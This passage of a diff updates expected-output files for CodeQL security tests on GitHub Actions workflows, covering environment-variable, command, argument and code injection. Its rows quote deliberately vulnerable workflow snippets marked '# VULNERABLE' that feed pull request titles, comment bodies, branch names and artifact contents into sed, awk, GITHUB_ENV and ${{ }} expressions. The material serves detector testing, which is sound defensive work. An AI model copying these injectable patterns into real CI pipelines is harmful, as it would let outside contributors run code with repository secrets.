| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index decabad082fb..281fd39552a7 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected 
+++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -3,4 +3,4 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index bd0684d17117..5eddb791ae5c 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected 
@@ -21,15 +21,15 @@ nodes | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | -| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | -| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | -| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | -| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 4a2950d84ae9..dad99f0029a2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -613,154 +613,154 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | .github/workflows/composite-action-caller-1.yml | -| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | .github/workflows/argus_case_study.yml | -| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning1.yml | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning2.yml | -| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning3.yml | -| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning4.yml | -| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). 
